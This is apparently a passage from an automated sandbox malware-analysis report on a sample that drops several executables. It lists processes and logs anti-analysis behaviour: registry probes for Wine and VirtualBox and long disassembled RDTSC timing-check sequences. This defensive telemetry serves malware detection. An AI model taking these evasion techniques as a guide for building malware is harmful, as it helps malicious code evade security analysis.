Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6142F7 second address: 613B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 clc 0x0000000a push dword ptr [ebp+122D0FF5h] 0x00000010 mov dword ptr [ebp+122D31C9h], ecx 0x00000016 jnp 00007F4D44D0519Ch 0x0000001c call dword ptr [ebp+122D23D5h] 0x00000022 pushad 0x00000023 clc 0x00000024 xor eax, eax 0x00000026 jmp 00007F4D44D051A2h 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f stc 0x00000030 mov dword ptr [ebp+122D3A39h], eax 0x00000036 mov dword ptr [ebp+122D23D0h], ebx 0x0000003c mov esi, 0000003Ch 0x00000041 mov dword ptr [ebp+122D2382h], edx 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b sub dword ptr [ebp+122D23D0h], ecx 0x00000051 mov dword ptr [ebp+122D2577h], ecx 0x00000057 lodsw 0x00000059 clc 0x0000005a add eax, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D24D9h], edi 0x00000064 mov ebx, dword ptr [esp+24h] 0x00000068 mov dword ptr [ebp+122D24F2h], ecx 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 jne 00007F4D44D0519Ch 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 613B70 second address: 613B98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jng 00007F4D45034D18h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007F4D45034D16h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E69 second address: 794E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E6D second address: 794E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D45034D27h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E8E second address: 794E92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794E92 second address: 794EAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D45034D1Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794EAC second address: 794ED6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jg 00007F4D44D05196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007F4D44D051AEh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E2A second address: 793E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 793E32 second address: 793E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007F4D44D0519Eh 0x0000000d jo 00007F4D44D05196h 0x00000013 push edx 0x00000014 pop edx 0x00000015 pushad 0x00000016 jnp 00007F4D44D05196h 0x0000001c jmp 00007F4D44D051A5h 0x00000021 jl 00007F4D44D05196h 0x00000027 popad 0x00000028 popad 0x00000029 push edx 0x0000002a push ecx 0x0000002b jnp 00007F4D44D05196h 0x00000031 jmp 00007F4D44D051A4h 0x00000036 pop ecx 0x00000037 pushad 0x00000038 push edx 0x00000039 pop edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794196 second address: 7941A0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 794487 second address: 79448B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79448B second address: 79448F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79448F second address: 7944EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4D44D051A9h 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F4D44D0519Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 jl 00007F4D44D0519Eh 0x0000001e jo 00007F4D44D05196h 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4D44D051A4h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7944EA second address: 7944EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798353 second address: 7983B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D051A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jc 00007F4D44D05196h 0x00000014 popad 0x00000015 jmp 00007F4D44D051A0h 0x0000001a popad 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f jmp 00007F4D44D051A8h 0x00000024 mov eax, dword ptr [eax] 0x00000026 js 00007F4D44D051A2h 0x0000002c jng 00007F4D44D0519Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7983B4 second address: 798416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 jmp 00007F4D45034D28h 0x0000000d pop eax 0x0000000e jmp 00007F4D45034D1Dh 0x00000013 push 00000003h 0x00000015 push esi 0x00000016 sub dword ptr [ebp+124515D6h], eax 0x0000001c pop ecx 0x0000001d push 00000000h 0x0000001f sub esi, dword ptr [ebp+122D3789h] 0x00000025 push 00000003h 0x00000027 mov edx, dword ptr [ebp+122D3891h] 0x0000002d call 00007F4D45034D19h 0x00000032 push esi 0x00000033 je 00007F4D45034D18h 0x00000039 push edx 0x0000003a pop edx 0x0000003b pop esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push esi 0x00000042 pop esi 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798416 second address: 798429 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798429 second address: 798433 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4D45034D1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798433 second address: 798447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F4D44D05196h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798447 second address: 79844D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79844D second address: 798473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4D44D051A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798473 second address: 7984CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jnc 00007F4D45034D20h 0x00000014 pop eax 0x00000015 movzx edi, si 0x00000018 lea ebx, dword ptr [ebp+124581E0h] 0x0000001e jmp 00007F4D45034D23h 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F4D45034D21h 0x0000002c push edx 0x0000002d pop edx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7984CD second address: 7984E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4D44D05198h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4D44D0519Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798587 second address: 79858B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79858B second address: 7985EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D44D0519Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov ecx, dword ptr [ebp+122D3779h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F4D44D05198h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c mov edx, dword ptr [ebp+122D38CDh] 0x00000032 call 00007F4D44D05199h 0x00000037 pushad 0x00000038 push eax 0x00000039 push esi 0x0000003a pop esi 0x0000003b pop eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F4D44D051A4h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79877A second address: 798781 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798781 second address: 798801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jbe 00007F4D44D051A5h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F4D44D05198h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 sub dword ptr [ebp+122D2577h], eax 0x0000002f push 00000000h 0x00000031 pushad 0x00000032 sub ch, FFFFFFECh 0x00000035 add dword ptr [ebp+122D2382h], ecx 0x0000003b popad 0x0000003c sbb ecx, 5DF3F557h 0x00000042 push 5592A39Ah 0x00000047 pushad 0x00000048 js 00007F4D44D0519Ch 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F4D44D051A6h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 798801 second address: 79889C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4D45034D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xor dword ptr [esp], 5592A31Ah 0x00000012 jns 00007F4D45034D27h 0x00000018 push 00000003h 0x0000001a push eax 0x0000001b add dword ptr [ebp+122D1CF5h], edi 0x00000021 pop esi 0x00000022 push 00000000h 0x00000024 jg 00007F4D45034D1Ch 0x0000002a push 00000003h 0x0000002c push eax 0x0000002d xor dword ptr [ebp+122D3025h], edx 0x00000033 pop edi 0x00000034 call 00007F4D45034D19h 0x00000039 push ebx 0x0000003a ja 00007F4D45034D18h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 pushad 0x00000043 jl 00007F4D45034D18h 0x00000049 push ecx 0x0000004a pop ecx 0x0000004b jo 00007F4D45034D18h 0x00000051 pushad 0x00000052 popad 0x00000053 popad 0x00000054 mov eax, dword ptr [esp+04h] 0x00000058 jnl 00007F4D45034D2Fh 0x0000005e mov eax, dword ptr [eax] 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 79889C second address: 7988A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7988A1 second address: 7988A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7988A7 second address: 7988D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 pop eax 0x00000013 sub dword ptr [ebp+122D2577h], edi 0x00000019 lea ebx, dword ptr [ebp+124581F4h] 0x0000001f mov esi, dword ptr [ebp+122D3785h] 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push ebx 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7988D3 second address: 7988E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8963 second address: 7B8969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8969 second address: 7B8974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6806 second address: 7B6810 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4D44D051B3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B693F second address: 7B6945 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6945 second address: 7B695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F4D44D05196h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B695B second address: 7B695F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B695F second address: 7B697B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D44D0519Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007F4D44D0519Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6F3A second address: 7B6F3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B6F3E second address: 7B6F50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F4D44D05196h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B70B1 second address: 7B70B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78C35C second address: 78C396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4D44D05196h 0x0000000a pop edi 0x0000000b push esi 0x0000000c jmp 00007F4D44D051A4h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4D44D051A6h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B77F4 second address: 7B7816 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F4D45034D1Bh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B7816 second address: 7B7826 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4D44D05196h 0x00000008 ja 00007F4D44D05196h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DF1A second address: 78DF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B7AF9 second address: 7B7AFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B821A second address: 7B823A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4D45034D20h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c js 00007F4D45034D2Ah 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B823A second address: 7B8244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B8515 second address: 7B851F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87B5 second address: 7B87C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 ja 00007F4D44D05196h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B87C7 second address: 7B87ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4D45034D27h 0x00000009 jmp 00007F4D45034D1Ah 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9F72 second address: 7B9F77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7B9F77 second address: 7B9FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jns 00007F4D45034D16h 0x0000000e jng 00007F4D45034D16h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a jng 00007F4D45034D29h 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F4D45034D21h 0x00000027 pushad 0x00000028 jnp 00007F4D45034D16h 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BD578 second address: 7BD57E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDAB7 second address: 7BDABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE64 second address: 7BDE69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE69 second address: 7BDE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE6F second address: 7BDE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F4D44D051A8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE81 second address: 7BDE85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BDE85 second address: 7BDE89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C0278 second address: 7C0280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C775C second address: 7C7776 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4D44D0519Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F4D44D05196h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C7776 second address: 7C7796 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F4D45034D1Eh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
